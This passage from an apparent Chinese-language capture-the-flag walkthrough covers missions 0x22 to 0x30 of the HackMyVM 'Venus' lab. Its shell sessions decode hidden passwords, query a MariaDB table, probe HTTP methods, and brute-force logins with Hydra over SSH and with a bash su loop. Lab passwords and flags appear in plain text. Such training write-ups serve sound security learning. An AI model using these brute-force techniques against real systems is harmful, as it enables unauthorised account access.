bDPDFifb65EIbPvvz712/wAN/hdpXw4sbj7LPLqGp3pDXmoXAw8p64A52rkk4yTk8k8YcUuZTfT8 xSfuuPc4ewtYLj9sjU5J4ld7fSFkiLD7jbI1yPfDMPxqb9pxR/whOhSYG9dZi2tjkfI/Q/gK6ey8 A6pbfHrUPGzz2Z02504WqRB284OAnJG3bj5T/F6Uvxi8Bap8QfDenafo09pBLa6gl07XbsqlQrAg bVbn5hSjpGHk1/6Vf8invL0/9tt+ZyHxstbS++KHwyttTRZLWa/ZZEcZVwXi4PqCeK7/AOLdvZ3H wh8SpqCoYVsJHXd2dRlCPfcFxWD8VfhZefEXXfDMqXUFvYaa8n2wmVkm2tswYsKRuG0nkjtXNX/w g+JPiqSPRvG3j6K88MwyA7beLbcTqp43jYBnjqzPg881Nuanybav8QT5ZKfZL9TR8I/EHT/A3wM8 GXHiq2vZYL9fsgkijV1jG5tpfcy4XYO2eBWz4g+APw98QtJMNIOmzy8+dpspiA+icxj/AL5rpdf8 A6D4i8C/8Ind2vlabHEkcAiOGt9gwjITnke+c85zk15lb/DX4yeGIV03wf8AEKyl0yPiIajFl0Xs o3RSYA9A2Park1KbduuhMU4wS8tRPD41v4VfGTR/Bh1+713w/rkDm3hvG3S2ZUHGD6fL2wDk8ZFZ XjnwzqXiz9pxtN0XxFd+Hbn+xUk+22gbftBOV+V0ODn17V3XgL4SXOh+KH8W+Nddk8Q+I2QpHKwI jtgRghM9eCQOAACcDvWgPAupj48Hxr59p/Zp0v7H5W9vO35znG3bj/gWfalbWPNra/5Owfzcvl+a ucdJ8AfEt/GbbXPizr2oWMnEtsyyYcenzTMPzBrsdQ8H6T4G+COv6JoMLJbRaVdMzyHc8rmJsux7 k/gOgAAGK76srxRpk2t+EdX0q0aNJ76xmt42kJChnQqCSATjJ9DUzu4SS6mlOynFvozhf2draG3+ CWkyQxKj3Ek8krAcu3msuT+CgfhXO/BK0t1+L/xPmWCMSxal5cbhRlVaWYkD0BKr+Qr0P4W+E77w R8ONN8P6rLbzXdoZd72zM0Z3SM4wWAPRh2rK+HngDVPCXjfxprGpXFnLb69ei4tVgdi6LvkbDgqA Dhx0J71tJr2ra7P81+hkl+6t5r82ct4pAT9r7weUG0vpUm8jjd8tx19a9srzzW/AGqal8dfD/jSC 4s103TLJ7eaJ3YTMxEoyoC7SP3g6sO9eh1C+BL1/Nly1nddl+QUUUUhBRRRQAUUUUAFFFFABRRRQ AU2RFkjZHGVYEEeoNOopNXVmBwPgP4M+Ffh7qtxqWjLd3F7MpRZryRXMKHqqBVUDPqcn3rvqKKq4 BRRRSAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC iiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKK KKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo oAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiig AooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAP /9k= iris@venus:~$ cat irispass.txt kYjyoLcnBZ9EJdz iris@venus:~$ cat eloise | base64 -d ����JFIF``���ExifMM;sML�J��� >������85��85� �2021:11:10 10:18:032021:11:10 10:18:03sML�� http://ns.adobe.com/xap/1.0/<?xpacket begin='' id='W5M0MpCehiHzreSzNTczkc9d'?> <x:xmpmeta xmlns:x="adobe:ns:meta/"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"/><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:xmp="http://ns.adobe.com/xap/1.0/"><xmp:CreateDate>2021-11-10T10:18:03.849</xmp:CreateDate></rdf:Description><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:creator><rdf:Seq xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li>sML</rdf:li></rdf:Seq> </dc:creator></rdf:Description></rdf:RDF></x:xmpmeta> ........ iris@venus:~$
发现似乎是一个照片,尝试进行识别,使用 cyberchef,base64 解码以后点一下魔术棒得到密码:
yOUJlV0SHOnbSPm
22 eloise
eloise@venus:~$ ls -la total 36 drwxr-x--- 2 root eloise 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 eloise eloise 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 eloise eloise 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 eloise eloise 807 Apr 23 2023 .profile -rw-r----- 1 root eloise 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root eloise 50 Apr 5 06:28 hi -rw-r----- 1 root eloise 194 Apr 5 06:27 mission.txt eloise@venus:~$ cat hi 00000000: 7576 4d77 4644 5172 5157 504d 6547 500a eloise@venus:~$ cat flagz.txt 8===57CzBLKaEq2N8YBFRu31===D~~ eloise@venus:~$ cat mission.txt ################ # MISSION 0x22 # ################ ## EN ## User lucia has been creative in saving her password. ## ES ## La usuaria lucia ha sido creativa en la forma de guardar su password. eloise@venus:~$ xxd hi 00000000: 3030 3030 3030 3030 3a20 3735 3736 2034 00000000: 7576 4 00000010: 6437 3720 3436 3434 2035 3137 3220 3531 d77 4644 5172 51 00000020: 3537 2035 3034 6420 3635 3437 2035 3030 57 504d 6547 500 00000030: 610a a. eloise@venus:~$ xxd -h Usage: xxd [options] [infile [outfile]] or xxd -r [-s [-]offset] [-c cols] [-ps] [infile [outfile]] Options: -a toggle autoskip: A single '*' replaces nul-lines. Default off. -b binary digit dump (incompatible with -ps,-i,-r). Default hex. -C capitalize variable names in C include file style (-i). -c cols format <cols> octets per line. Default 16 (-i: 12, -ps: 30). -E show characters in EBCDIC. Default ASCII. -e little-endian dump (incompatible with -ps,-i,-r). -g bytes number of octets per group in normal output. Default 2 (-e: 4). -h print this summary. -i output in C include file style. -l len stop after <len> octets. -n name set the variable name used in C include output (-i). -o off add <off> to the displayed file position. -ps output in postscript plain hexdump style. -r reverse operation: convert (or patch) hexdump into binary. -r -s off revert with <off> added to file positions found in hexdump. -d show offset in decimal instead of hex. -s [+][-]seek start at <seek> bytes abs. (or +: rel.) infile offset. -u use upper case hex letters. -v show version: "xxd 2022-01-14 by Juergen Weigert et al.". eloise@venus:~$ xxd -r hi uvMwFDQrQWPMeGP
23 lucia
lucia@venus:~$ ls -la total 36 drwxr-x--- 2 root lucia 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 lucia lucia 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 lucia lucia 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 lucia lucia 807 Apr 23 2023 .profile -rw-r----- 1 root lucia 1998 Apr 5 06:28 dict.txt -rw-r----- 1 root lucia 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root lucia 397 Apr 5 06:27 mission.txt lucia@venus:~$ cat flagz.txt 8===5Sr2pqeVTmn8RaaPmTPE===D~~ lucia@venus:~$ cat mission.txt ################ # MISSION 0x23 # ################ ## EN ## The user isabel has left her password in a file in the /etc/xdg folder but she does not remember the name, however she has dict.txt that can help her to remember. ## ES ## La usuaria isabel ha dejado su password en un fichero en la carpeta /etc/xdg pero no recuerda el nombre, sin embargo tiene dict.txt que puede ayudarle a recordar. lucia@venus:~$ head -n 10 dict.txt s hack hacker handler hanlder happening head header headers lucia@venus:~$ ls /etc/xdg ls: cannot open directory '/etc/xdg': Permission denied
只能尝试进行爆破了,这里我没写出来,我看了别的师傅写的脚本,学习一下:
while IFS= read -r line; do readlink -e /etc/xdg/$line; done<dict.txt
- IFS= 不会对输入行进行分割
- -r 不解释反斜杠
- readlink 用于解析符号链接并返回目标文件的路径。
- -e 返回绝对路径
lucia@venus:~$ while IFS= read -r line; do readlink -e /etc/xdg/$line; done<dict.txt /etc/xdg /etc/xdg/readme lucia@venus:~$ cat /etc/xdg/readme H5ol8Z2mrRsorC0
24 isabel
lucia@venus:~$ su isabel Password: isabel@venus:/pwned/lucia$ cd ~ isabel@venus:~$ ls -la total 180 drwxr-x--- 2 root isabel 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 isabel isabel 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 isabel isabel 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 isabel isabel 807 Apr 23 2023 .profile -rw-r----- 1 root isabel 150544 Apr 5 06:28 different.txt -rw-r----- 1 root isabel 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root isabel 245 Apr 5 06:27 mission.txt isabel@venus:~$ cat flagz.txt 8===Md2CU83GtVfouhm9U0AS===D~~ isabel@venus:~$ cat mission.txt ################ # MISSION 0x24 # ################ ## EN ## The password of the user freya is the only string that is not repeated in different.txt ## ES ## La password de la usuaria freya es el unico string que no se repite en different.txt isabel@venus:~$ head different.txt -n 10 3e73c17ede4b9b4 3e73c17ede4b9b4 fb834b364abb5eb fb834b364abb5eb 36771e2733ec17c 36771e2733ec17c 47949b26a7c452a 47949b26a7c452a 371cedbb4a4e593 371cedbb4a4e593 isabel@venus:~$ cat different.txt | uniq -c 2 3e73c17ede4b9b4 2 fb834b364abb5eb 2 36771e2733ec17c ....... isabel@venus:~$ cat different.txt | uniq -c | sort -n 1 EEDyYFDwYsmYawj 2 00010b0765c11cc 2 00205d587090943 2 00213023c9abfbe 2 002b4e53be7876f 2 0034acdf29fb163 .......
找到了那个密码 EEDyYFDwYsmYawj
isabel@venus:~$ su -l freya Password: freya@venus:~$
25 freya
freya@venus:~$ ls -la total 32 drwxr-x--- 2 root freya 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 freya freya 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 freya freya 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 freya freya 807 Apr 23 2023 .profile -rw-r----- 1 root freya 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root freya 262 Apr 5 06:27 mission.txt freya@venus:~$ cat flagz.txt 8===m1rRSv2pdm3sBGmgidul===D~~ freya@venus:~$ cat mission.txt ################ # MISSION 0x25 # ################ ## EN ## User alexa puts her password in a .txt file in /free every minute and then deletes it. ## ES ## La usuaria alexa pone su password en un fichero .txt en la carpeta /free cada minuto y luego lo borra. freya@venus:~$ while true; do cat /free/* 2>/dev/null; done mxq9O3MSxxX9Q3S mxq9O3MSxxX9Q3S mxq9O3MSxxX9Q3S mxq9O3MSxxX9Q3S mxq9O3MSxxX9Q3S mxq9O3MSxxX9Q3S ....... freya@venus:~$ su -l alexa Password: alexa@venus:~$
26 alexa
alexa@venus:~$ ls -la total 32 drwxr-x--- 2 root alexa 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 alexa alexa 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 alexa alexa 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 alexa alexa 807 Apr 23 2023 .profile -rw-r----- 1 root alexa 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root alexa 172 Apr 5 06:27 mission.txt alexa@venus:~$ cat flagz.txt 8===12ALP3eLlJ1GrTBxwJQM===D~~ alexa@venus:~$ cat mission.txt ################ # MISSION 0x26 # ################ ## EN ## The password of the user ariel is online! (HTTP) ## ES ## El password de la usuaria ariel esta online! (HTTP) alexa@venus:~$ curl http://127.0.1 33EtHoz9a0w2Yqo
27 ariel
ariel@venus:~$ ls -la total 44 drwxr-x--- 2 root ariel 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 ariel ariel 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 ariel ariel 3526 Apr 23 2023 .bashrc -rw-r----- 1 root ariel 12288 Apr 5 06:28 .goas.swp -rw-r--r-- 1 ariel ariel 807 Apr 23 2023 .profile -rw-r----- 1 root ariel 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root ariel 254 Apr 5 06:27 mission.txt ariel@venus:~$ cat flagz.txt 8===lqTeJ1msxhNjNJCptxmZ===D~~ ariel@venus:~$ cat mission.txt ################ # MISSION 0x27 # ################ ## EN ## Seems that ariel dont save the password for lola, but there is a temporal file. ## ES ## Parece ser que a ariel no le dio tiempo a guardar la password de lola... menosmal que hay un temporal! ariel@venus:~$ vim -h VIM - Vi IMproved 9.0 (2022 Jun 28, compiled May 04 2023 10:24:44) Usage: vim [arguments] [file ..] edit specified file(s) or: vim [arguments] - read text from stdin or: vim [arguments] -t tag edit file where tag is defined or: vim [arguments] -q [errorfile] edit file with first error Arguments: -- Only file names after this -v Vi mode (like "vi") -e Ex mode (like "ex") -E Improved Ex mode -s Silent (batch) mode (only for "ex") -d Diff mode (like "vimdiff") -y Easy mode (like "evim", modeless) -R Readonly mode (like "view") -Z Restricted mode (like "rvim") -m Modifications (writing files) not allowed -M Modifications in text not allowed -b Binary mode -l Lisp mode -C Compatible with Vi: 'compatible' -N Not fully Vi compatible: 'nocompatible' -V[N][fname] Be verbose [level N] [log messages to fname] -D Debugging mode -n No swap file, use memory only -r List swap files and exit -r (with file name) Recover crashed session -L Same as -r -A Start in Arabic mode -H Start in Hebrew mode -T <terminal> Set terminal type to <terminal> --not-a-term Skip warning for input/output not being a terminal --ttyfail Exit if input or output is not a terminal -u <vimrc> Use <vimrc> instead of any .vimrc --noplugin Don't load plugin scripts -p[N] Open N tab pages (default: one for each file) -o[N] Open N windows (default: one for each file) -O[N] Like -o but split vertically + Start at end of file +<lnum> Start at line <lnum> --cmd <command> Execute <command> before loading any vimrc file -c <command> Execute <command> after loading the first file -S <session> Source file <session> after loading the first file -s <scriptin> Read Normal mode commands from file <scriptin> -w <scriptout> Append all typed commands to file <scriptout> -W <scriptout> Write all typed commands to file <scriptout> -x Edit encrypted files --startuptime <file> Write startup timing messages to <file> --log <file> Start logging to <file> early -i <viminfo> Use <viminfo> instead of .viminfo --clean 'nocompatible', Vim defaults, no plugins, no viminfo -h or --help Print Help (this message) and exit --version Print version information and exit ariel@venus:~$ vim -r .goas.swp Thats my little DIc with my old and current passwOrds: -->ppkJjqYvSCIyAhK -->cOXlRYXtJWnVQEG --rxhKeFKveeKqpwp -->RGBEMbZHZRgXZnu -->IaOpTdAuhSjGZnu -->NdnszvjulNellbK -->GBUguuSpXVjpxLc -->rSkPlPhymYcerMJ -->PEOppdOkSqJZweH -->EKvJoTBYlwtwFmv -->d3LieOzRGX5wud6 -->mYhQVLDKdJrsIwG -->DabEJLmAbOQxEnD -->LkWReDaaLCMDlLf -->cbjYGSvqAsqIvdg -->QsymOOVbzSaKmRm -->bnQgcXYamhSDSff -->VVjqJGRrnfKmcgD
按 gg 可以到页面顶部第一个字符上面去,使用 dd 即可删除改行,按 dw 可以删除单词,按. 可以执行上一个命令,如此即可删除掉所有的 --> 和空白行,然后按
:w /tmp/pass :q!
进行保存,后面可以尝试进行爆破,我使用 hydra 进行爆破的,也可以尝试使用 bash 脚本进行爆破:
hgbe02@pwn:~/temp$ hydra -l lola -P pass ssh://venus.hackmyvm.eu:5000 Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-01 01:44:04 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 18 login tries (l:1/p:18), ~2 tries per task [DATA] attacking ssh://venus.hackmyvm.eu:5000/ [5000][ssh] host: venus.hackmyvm.eu login: lola password: d3LieOzRGX5wud6 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-01 01:44:14
下面附上大佬写的脚本,很优雅:
while IFS= read -r line; do echo $line | timeout 2 su lola 2>/dev/null; if [ $? -eq 0 ]; then echo $line; break; fi; done < /tmp/dict.txt
28 lola
lola@venus:~$ ls -la total 36 drwxr-x--- 2 root lola 4096 Apr 5 06:28 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 lola lola 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 lola lola 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 lola lola 807 Apr 23 2023 .profile -rw-r----- 1 root lola 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root lola 272 Apr 5 06:27 mission.txt -rw-r----- 1 root lola 1438 Apr 5 06:28 pages.txt lola@venus:~$ cat flagz.txt 8===TMYRw853hx8yKRocFMgM===D~~ lola@venus:~$ cat mission.txt ################ # MISSION 0x28 # ################ ## EN ## The user celeste has left a list of names of possible .html pages where to find her password. ## ES ## La usuaria celeste ha dejado un listado de nombres de posibles paginas .html donde encontrar su password. lola@venus:~$ cat pages.txt new-servers server-updates SenSage_LEO 1355485668 25101 Real-Time Communication ulist VGVsbmV0 15915 mumbo planet-icon DealTime_57c 121616253 708303201 suppliers_logos imagesPage bar-left webdev-logo h-line 34552 479800180 1080410073 symm 1665300941 time-date image-effects 1412058599 1166197595 1115392848 1083085151 Dotster_47c agi grotius primers decades upfront sitecredits SSC Kids-Software Projector-Accessories Ink Microphones Satellite-Radio existingcustomers media-types junkbuster symankr career-opportunities corner_ur corner_ul findlaw classaction Factsheets Comets symantch dark_grey Sunbelt penguin_log cswift eref symantecpress symanbr h_consumerassistanceheader h_homeb h_parentsb h_privacyb h_consumerassistanceb h_consumerfaqsb h_mainheader dmasponsorship consumerfaqs symantde pc_dots ci_4958157 themonitor Columbus glo regan GR2006120500981 uscode49 uscode39 uscode20 DEFAULT uscode12 toxins ferris Jan07 000109 efpa funders badads civicactions iraq_plans askthepilot215 mail_cover 081606 092306 book_review consumerprotection facta 050518 IWC ahead shah rockertraining respiratory 197442_1 xCH-computer_accessories xCH-computer_memory xCH-networking xCH-components xCH-inputdevices xPP-Monitors xPP-PC_Desktops xCH-hardware 116044 20061226 logo_eseminars cebolla logo_pcmag 1999-02 pcmagnetwork 40305 breastcancer infocusRel key2 xCH-software check_prices rev_snapshot ca-library pubs1 bullet_P1 bullet_B1 spectral lola@venus:~$ while IFS= read -r line; do curl -s http://127.0.1/$line ; done < pages.txt 2>/dev/null | grep -v '<' 33EtHoz9a0w2Yqo 33EtHoz9a0w2Yqo
但是无法正常进行切换用户,可能是兔子洞,重新改了一下:
lola@venus:~$ while IFS= read -r line; do curl -s http://127.0.0.1/$line.html ; done < pages.txt 2>/dev/null | grep -v ' <' VLSNMTKwSV2o8Tn
29 celeste
celeste@venus:~$ ls -la total 32 drwxr-x--- 2 root celeste 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 celeste celeste 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 celeste celeste 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 celeste celeste 807 Apr 23 2023 .profile -rw-r----- 1 root celeste 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root celeste 179 Apr 5 06:27 mission.txt celeste@venus:~$ cat flagz.txt 8===TrdsvMy99slFZtd4Cy4Q===D~~ celeste@venus:~$ cat mission.txt ################ # MISSION 0x29 # ################ ## EN ## The user celeste has access to mysql but for what? ## ES ## La usuaria celeste tiene acceso al mysql, pero para que? celeste@venus:~$ mysql -uceleste -pVLSNMTKwSV2o8Tn Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 1341 Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12 Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MariaDB [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | venus | +--------------------+ 2 rows in set (0.002 sec) MariaDB [(none)]> use venus; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MariaDB [venus]> show tables; +-----------------+ | Tables_in_venus | +-----------------+ | people | +-----------------+ 1 row in set (0.001 sec) MariaDB [venus]> select * from people; +-----------+---------------+--------------------------------+ | id_people | uzer | pazz | +-----------+---------------+--------------------------------+ | 1 | nuna | ixpfdsvcxeqdW | | 2 | nona | ixpvcxvcxeqdW | | 3 | manue | ixpfdsfdseqdW | | 4 | samoa | ixperrewrweqdW | | 5 | dsaewq | ixpefdsfsqdW | | 6 | fdsfewrew | ixpedvcxv4qdW | | 7 | koiuoiudsadas | ixpredsfdeqdW | | 8 | vcxfdsfew | ixp342432eqdW | | 9 | dasd | ixpeiuyiuyqdW | | 10 | helen | uytuytjhgixpeqdW | | 11 | tudou | ijhgjghxpeqfdfsfddW | | 12 | fdsoiurew | ixpfdsfsdsvcxvcxeqdW | | 13 | inan | imbnmnbxpeqdW | | 14 | zkret | ixpeqkjhkhjkdW | | 15 | cjhcx | i432423xpeqdW | | 16 | sfdfdsml | ixpeqdsfsdfdsfW | | 17 | svcxvcxml | 432423ixpeqdW | | 18 | xml | ixpejhgjhgqdW | | 19 | pdf | ixperewrewrewqdW | | 20 | txt | ixpeuytuytqdW | | 21 | vcxvcx | ixpefdsfdsfdfdsqdW | | 22 | dsadsa | ixpeqdjhkjhW | | 23 | lel | ixpvcxvcxvcxeqdW | | 24 | lul | ixpeqdmnbmnbmnbmW | | 25 | dog | ixperewrewrewqdW | | 26 | cat | ixvcxvdsfsdvpeqdW | | 27 | pet | ixiufohsyuoirewpeqdW | | 28 | pzzz | ixvcxvcxvpeqdW | | 29 | ls | ixpehgfdhdhqdW | | 30 | vi | ixpetrvvrqdW | | 31 | tmux | iuovcxoiujvcxixpeqdW | | 32 | screen | ixpeqrewregfdgdW | | 33 | yes | ixpebvcgdfgqdW | | 34 | nop | ixpefdsqdW | | 35 | haha | 8===xKmPDsJSKpHLzkqKXyjx===D~~ | | 36 | love | ixpegfdgqdW | | 37 | dsadsa | fdsvcxvcxixpeqdW | | 38 | d4t4 | erwerewreixpeqdW | | 39 | nna | gdfgdixpeqdW | | 40 | nin | aaafdixpeqdW | | 41 | tre | fdsafixpeqdW | | 42 | tfas | igfdgfdgxpeqdW | | 43 | zcxc | ixfdgdfgpeqdW | | 44 | yuio | ixpgbvcbvcbeqdW | | 45 | jhgyurtrt | treterterixpeqdW | | 46 | lodsa | itreterxpeqdW | | 47 | zarah | ixpvcbvcbeqdW | | 48 | zkkad | ixpedfgvbcxbvcqdW | | 49 | bvher | vcxvcxgfdgfdixpeqdW | | 50 | dsadsa | ixpeqergdfwer32dW | | 51 | ch4rm | ixpeewf23qdW | | 52 | Aza | ixpjhgjgheqdW | | 53 | avij | ixpegfdgdfgqdW | | 54 | crom | ixpefdbvvcbrqdW | | 55 | bubu | ixpetretretqdW | | 56 | bebe | ixpeghfgfdqdW | | 57 | baba | ixpeffesfqdW | | 58 | bael | ixpesdvsdvsdqdW | | 59 | vaze | ixpe23r23rf23qdW | | 60 | upper | ixpe43r43rqdW | | 61 | loz | ixpeqddfsdW | | 62 | mind | ixpfsdfsdfsdeqdW | | 63 | mymy | ixpevcxvqdW | | 64 | ina | ixpee23e32rqdW | | 65 | ein | ixpejytjytjhgjqdW | | 66 | n1n4 | ixpehgjghjhghgqdW | | 67 | where | ixljkgjgpeqdW | | 68 | you | ixpeqdhggjhgjW | | 69 | are | ixVCXVCXVCXVCXdW | | 70 | what | ixpeqhgjggdW | | 71 | dsaqqqqqq | ixpeqVCXVCXdW | | 72 | h0j3n | ixpemnbmbnmghqdW | | 73 | nana | ixpeqVSDFWCdW | | 74 | nina | ixpeqdWuvC5N9kG | | 75 | nunu | ixpeSFDSFDSVCXqdW | | 76 | fdse | ixpeDFSWEF2qdW | | 77 | dsar | ixpeF43F3F34qdW | | 78 | yop | ixpeqdWCSDFDSFD | | 79 | loco | ixpeF43F34F3qdW | | 80 | zaza | ixpeYUTHNYGTHYTqdW | | 81 | jhon | ixpeFDSJYTUJTYqdW | | 82 | tell | ixpeHYTTqdW | | 83 | ma | uyixptje4FSFWEFqdW | | 84 | mum | jghixpeqdW | | 85 | nanaa | 432432ixpeqdW | | 86 | nnnniinn | irewxpeqdW | | 87 | iourewoiure | rewixpeqdW | | 88 | lkjfdsoiu | dsaixpeqdW | | 89 | vcxnoj | dasdasixpeqdW | | 90 | ioyuwer | ixpeqdvcxvcxW | | 91 | kaka | ixpeqdW | | 92 | nini | ixpeqdvcxW | | 93 | zong | ixpeqdWfdsfsdf | | 94 | nana | ixpefdsafdsqdW | | 95 | ninna | ixpeqOPUIFDSFDSdW | +-----------+---------------+--------------------------------+ 95 rows in set (0.001 sec)
找到一个 flag,名为 haha 的 flag => 8===xKmPDsJSKpHLzkqKXyjx===D~~
其他长度不一,筛选出长度在 15 个字符的密码,这是大多数用户的密码:
MariaDB [venus]> select * from people where length(pazz) = 15; +-----------+----------+-----------------+ | id_people | uzer | pazz | +-----------+----------+-----------------+ | 16 | sfdfdsml | ixpeqdsfsdfdsfW | | 44 | yuio | ixpgbvcbvcbeqdW | | 54 | crom | ixpefdbvvcbrqdW | | 58 | bael | ixpesdvsdvsdqdW | | 74 | nina | ixpeqdWuvC5N9kG | | 77 | dsar | ixpeF43F3F34qdW | | 78 | yop | ixpeqdWCSDFDSFD | | 79 | loco | ixpeF43F34F3qdW | +-----------+----------+-----------------+ 8 rows in set (0.005 sec)
尝试进行爆破:
sfdfdsml yuio crom bael nina dsar yop loco
ixpeqdsfsdfdsfW ixpgbvcbvcbeqdW ixpefdbvvcbrqdW ixpesdvsdvsdqdW ixpeqdWuvC5N9kG ixpeF43F3F34qdW ixpeqdWCSDFDSFD ixpeF43F34F3qdW
但是没有爆破出来,不知道为啥,尝试看一下是否存在用户,发现 nina 是存在的,尝试登录,成功!
30 nina
celeste@venus:~$ su -l nina Password: nina@venus:~$ ls -la total 32 drwxr-x--- 2 root nina 4096 Apr 5 06:27 . drwxr-xr-x 1 root root 4096 Apr 5 06:27 .. -rw-r--r-- 1 nina nina 220 Apr 23 2023 .bash_logout -rw-r--r-- 1 nina nina 3526 Apr 23 2023 .bashrc -rw-r--r-- 1 nina nina 807 Apr 23 2023 .profile -rw-r----- 1 root nina 31 Apr 5 06:27 flagz.txt -rw-r----- 1 root nina 197 Apr 5 06:27 mission.txt nina@venus:~$ cat flagz.txt 8===VwICIymoA1DczWJau1sG===D~~ nina@venus:~$ cat mission.txt ################ # MISSION 0x30 # ################ ## EN ## The user kira is hidding something in http://localhost/method.php ## ES ## La usuaria kira esconde algo en http://localhost/method.php nina@venus:~$ curl -i -s http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:26:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive I dont like this method! nina@venus:~$ curl -s -i -X POST http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:27:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive I dont like this method! nina@venus:~$ curl -s -i -X HEAD http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:28:42 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive ^C nina@venus:~$ curl -s -i -X PUT http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:29:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive tPlqxSKuT4eP3yr
更进一步的尝试:
nina@venus:~$ curl -s -i -X DELETE http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive I dont like this method! nina@venus:~$ curl -s -i -X CONNECT http://localhost/method.php HTTP/1.1 405 Not Allowed Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:30:15 GMT Content-Type: text/html Content-Length: 157 Connection: close <html> <head><title>405 Not Allowed</title></head> <body> <center><h1>405 Not Allowed</h1></center> <hr><center>nginx/1.22.1</center> </body> </html> nina@venus:~$ curl -s -i -X OPTIONS http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:30:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive I dont like this method! nina@venus:~$ curl -s -i -X TRACE http://localhost/method.php HTTP/1.1 405 Not Allowed Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:30:44 GMT Content-Type: text/html Content-Length: 157 Connection: close <html> <head><title>405 Not Allowed</title></head> <body> <center><h1>405 Not Allowed</h1></center> <hr><center>nginx/1.22.1</center> </body> </html> nina@venus:~$ curl -s -i -X PATCH http://localhost/method.php HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Sun, 30 Jun 2024 18:31:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 8===tPGClekAvQKSYthnLiwz===D~~I dont like this method!
哈哈,nice!!!!快夸我!!!
31 kira
